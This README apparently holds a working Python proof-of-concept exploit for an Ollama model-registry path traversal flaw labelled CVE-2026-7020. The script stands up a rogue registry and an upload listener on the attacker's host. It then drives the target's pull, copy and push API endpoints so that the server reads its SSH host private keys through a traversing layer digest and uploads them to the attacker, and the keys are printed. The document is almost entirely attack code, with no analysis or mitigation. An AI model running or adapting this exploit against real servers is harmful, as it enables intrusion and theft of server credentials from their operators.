README.md
Rendering markdown...
#!/usr/bin/env python3
"""CVE-2026-7020 — Ollama tensor digest path traversal -> SSH key exfil
Usage: python3 poc.py <HOST:PORT>
Example: python3 poc.py 192.168.1.50:11434
"""
import hashlib, json, socket, sys, threading, time, urllib.request
from http.server import HTTPServer, BaseHTTPRequestHandler
if len(sys.argv) != 2:
sys.exit(f"usage: {sys.argv[0]} HOST:PORT")
HOST = sys.argv[1]
LPORT = 9999
KEYS = [
("/etc/ssh/ssh_host_ed25519_key", [399, 411, 419, 432]),
("/etc/ssh/ssh_host_rsa_key", [2590, 2594, 2598, 2602, 2606, 2610, 2614, 2622, 2635]),
("/etc/ssh/ssh_host_ecdsa_key", [492, 497, 501, 505, 509, 513, 517, 521, 525]),
]
CFG = b'{"architecture":"amd64","os":"linux"}'
CFG_D = "sha256:" + hashlib.sha256(CFG).hexdigest()
def local_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try: s.connect(("8.8.8.8", 80)); return s.getsockname()[0]
finally: s.close()
LIP = local_ip()
st = {}
got = {}
class Reg(BaseHTTPRequestHandler):
def do_GET(self):
if "/manifests/" in self.path:
m = json.dumps({"schemaVersion": 2,
"mediaType": "application/vnd.docker.distribution.manifest.v2+json",
"config": {"mediaType": "application/vnd.docker.container.image.v1+json",
"digest": CFG_D, "size": len(CFG)},
"layers": [{"mediaType": "application/vnd.ollama.image.tensor",
"digest": st["trav"], "size": st["size"]}]}).encode()
self.send_response(200)
self.send_header("Content-Type", "application/vnd.docker.distribution.manifest.v2+json")
self.send_header("Content-Length", str(len(m)))
self.send_header("Docker-Content-Digest", "sha256:" + hashlib.sha256(m).hexdigest())
self.end_headers(); self.wfile.write(m)
elif "/blobs/" in self.path:
self.send_response(200)
self.send_header("Content-Length", str(len(CFG)))
self.end_headers(); self.wfile.write(CFG)
else:
self.send_response(200)
self.send_header("Docker-Distribution-API-Version", "registry/2.0")
self.end_headers()
def do_HEAD(self):
code = 200 if "/blobs/" in self.path else 404
self.send_response(code)
if code == 200: self.send_header("Content-Length", str(len(CFG)))
self.end_headers()
def log_message(self, *a): pass
class Exf(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header("Docker-Distribution-API-Version", "registry/2.0")
self.end_headers()
def do_HEAD(self):
self.send_response(404); self.end_headers()
def do_POST(self):
cl = int(self.headers.get("Content-Length", 0))
if cl: self.rfile.read(cl)
self.send_response(202)
self.send_header("Location", f"http://{LIP}:{LPORT+1}{self.path.rstrip('/')}/u")
self.send_header("Docker-Upload-UUID", "u"); self.end_headers()
def do_PATCH(self):
cl = int(self.headers.get("Content-Length", 0))
data = self.rfile.read(cl) if cl else b""
self._cap(data)
self.send_response(202)
self.send_header("Location", f"http://{LIP}:{LPORT+1}{self.path}")
self.send_header("Range", f"0-{max(cl-1, 0)}")
self.send_header("Docker-Upload-UUID", "u"); self.end_headers()
def do_PUT(self):
cl = int(self.headers.get("Content-Length", 0))
data = self.rfile.read(cl) if cl else b""
if "/manifests/" not in self.path: self._cap(data)
self.send_response(201); self.end_headers()
def _cap(self, data):
clean = data.rstrip(b"\x00")
if clean and (p := st.get("path")):
if len(clean) > len(got.get(p, b"")): got[p] = clean
def log_message(self, *a): pass
def api(ep, body, t=20):
try:
r = urllib.request.Request(f"http://{HOST}{ep}",
data=json.dumps(body).encode(), headers={"Content-Type": "application/json"})
return urllib.request.urlopen(r, timeout=t).read().decode()
except Exception as e: return str(e)
for cls, port in [(Reg, LPORT), (Exf, LPORT+1)]:
threading.Thread(target=HTTPServer(("0.0.0.0", port), cls).serve_forever, daemon=True).start()
time.sleep(0.3)
for i, (path, sizes) in enumerate(KEYS):
for size in sizes:
tag = f"x{i}s{size}"
st.update({"trav": f"sha256:../../../../../../../../{path.lstrip('/')}", "size": size, "path": path})
src = f"http://{LIP}:{LPORT}/l/{tag}:v"
dst = f"http://{LIP}:{LPORT+1}/l/{tag}:v"
if "success" in api("/api/pull", {"model": src, "insecure": True, "stream": False}).lower():
api("/api/copy", {"source": src, "destination": dst})
api("/api/push", {"model": dst, "insecure": True, "stream": False}, t=30)
api("/api/delete", {"model": src})
api("/api/delete", {"model": dst})
if path in got: break
for path, data in got.items():
print(f"=== {path} ===\n{data.decode(errors='replace')}")